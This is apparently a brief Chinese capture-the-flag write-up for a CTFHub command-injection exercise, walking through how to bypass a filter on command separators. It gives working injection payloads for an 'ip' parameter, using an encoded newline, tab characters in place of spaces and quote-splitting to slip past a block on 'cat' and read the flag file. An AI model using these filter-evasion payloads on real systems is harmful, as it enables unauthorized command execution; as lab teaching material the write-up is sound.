CTFHub 命令注入-综合练习
1.因为运算符被过滤掉了,我们先用分号测试一下命令是否执行;2.接下来我们用cat命令查看flag文件。发现可以执行,并且找到了flag文件。然后右键查看网页源代码,找到hub.
·
CTFHub 命令注入-综合练习
1.分析代码得知过滤了命令连接符号&、|、;因此常用命令连接符不可用,可以使用”%0a
, 并且在输入框并无结果,因此我们在url里输入命令:
?ip=127.0.0.1%0als#
看到了flag文件。
2.tab键可以自动补齐后面的内容ls%09*可查看所有的文件
?ip=127.0.0.1%0als%09*
3.接下来查看flag,因为cat被过滤了,我们可以使用单引号的url编码%27将cat的任意字母包裹:
?ip=127.0.0.1%0acd%09*is_here%0ac%27a%27t%09*_18891124428806.php#
然后查看源代码得到hub.
更多推荐
已为社区贡献1条内容
所有评论(0)